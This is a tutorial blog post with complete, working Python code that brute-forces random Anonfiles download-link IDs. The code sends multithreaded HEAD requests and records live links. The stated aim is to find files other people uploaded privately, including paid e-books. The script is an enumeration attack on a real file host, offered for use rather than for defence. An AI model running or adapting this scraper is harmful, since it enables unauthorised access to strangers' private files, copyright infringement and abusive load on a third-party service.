Finding Public Download Links To Private Files

Let us begin with the idea. We know that many people use file-hosting sites to upload their data: not only random dog pictures, but also malware or even things like paid e-books. So what can we do if we want to find these files? Most file-hosting services don’t have a search function on their site.

Bruteforcing Anonfiles Download Links With Python

This method is far from efficient, but it is interesting to play around with. First, let us take a look at an example link: https://anonfiles.com/Nc6f3a78qc/

It looks like the link ID consists of 10 random characters, which can be uppercase letters, lowercase letters, and digits.
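To get a feeling for how large the search space is, we can do a quick back-of-the-envelope calculation (this snippet is just an illustration, not part of the scraper):

import string

# 26 lowercase + 26 uppercase + 10 digits = 62 possible characters per position
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits
keyspace = len(charset) ** 10
print(f"{keyspace:,} possible IDs")  # roughly 8.4 * 10**17

With roughly 8.4 * 10^17 possible IDs, the vast majority of randomly generated links will return a 404, which is why this approach is so inefficient.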

We start with importing the needed modules:

import requests
import random
import string

We will use requests to check the status code of each link, and a combination of random and string to generate our link list.

We create our own function called “link_generator”. We define a size of 10 and the set of characters we want to use, then pick a random character from that set ten times and join the results together.

def link_generator(size=10, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
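Calling the function once gives us a single random ID; the output below is only an example, since every call returns something different:

print(link_generator())
# e.g. 'kP2xQ9aB7m'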

We need a function to load our link and check its status code.

First, we request the link with the requests module. We only send a HEAD request, so we receive the response headers instead of the whole file, which makes the script faster. Then we check whether the status code of the response is 200.

If it is, we print the link.

def load_url(url):
    r = requests.head(url)
    if r.status_code == 200:
        print(str(r.status_code) + ": " + url)

To use this function, we need a list of links to check. Let us create one with our link generator function: we define an empty list called “urls” and append our base URL with a random ending.

urls = []

for i in range(100):
    urls.append('https://anonfiles.com/' + link_generator())

If we now call our “load_url” function for each URL in the list, we can start brute-forcing links.

for url in urls:
    load_url(url)

Let’s clean the code up a bit and add multi-threading to check the links faster. I will also turn some variables into input prompts so the script is easier to run from the command line. This is the finished code:

import requests
import random
import string
from time import time
from concurrent.futures import ThreadPoolExecutor, as_completed

urls = []      # links to check
out = []       # one entry per finished check, used as a progress counter
results = []   # links that returned status code 200

THREADS = input("Threads: ")
AMOUNT = input("Links to scrape: ")

def link_generator(size=10, chars=string.ascii_lowercase + string.ascii_uppercase + string.digits):
    # Build a random 10-character ID from lowercase letters, uppercase letters, and digits
    return ''.join(random.choice(chars) for _ in range(size))

def load_url(url):
    # HEAD request only: we need the status code, not the file itself
    r = requests.head(url)
    if r.status_code == 200:
        print(str(r.status_code) + ": " + url)
        results.append(url)

# Build the list of random candidate links
for i in range(int(AMOUNT)):
    urls.append('https://anonfiles.com/' + link_generator())

start = time()
with ThreadPoolExecutor(max_workers=int(THREADS)) as executor:
    future_to_url = (executor.submit(load_url, url) for url in urls)

    for future in as_completed(future_to_url):
        out.append(1)
        print("Checked: " + str(len(out)) + " - " + "Results: " + str(len(results)), end="\r")

print(f'Time taken: {time() - start}')
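One possible improvement that is not part of the script above: requests.head has no timeout by default, so a single unresponsive server can stall a worker thread. A minimal sketch of a more robust load_url, assuming a 5-second timeout is acceptable:

def load_url(url):
    try:
        # Give up if the server does not answer within 5 seconds (arbitrary value)
        r = requests.head(url, timeout=5)
    except requests.exceptions.RequestException:
        # Skip network errors and timeouts instead of crashing the thread
        return
    if r.status_code == 200:
        print(str(r.status_code) + ": " + url)
        results.append(url)

Apart from that, usage is simple: run the script, enter the number of threads and the number of links to generate, and the progress counter updates in place thanks to end="\r".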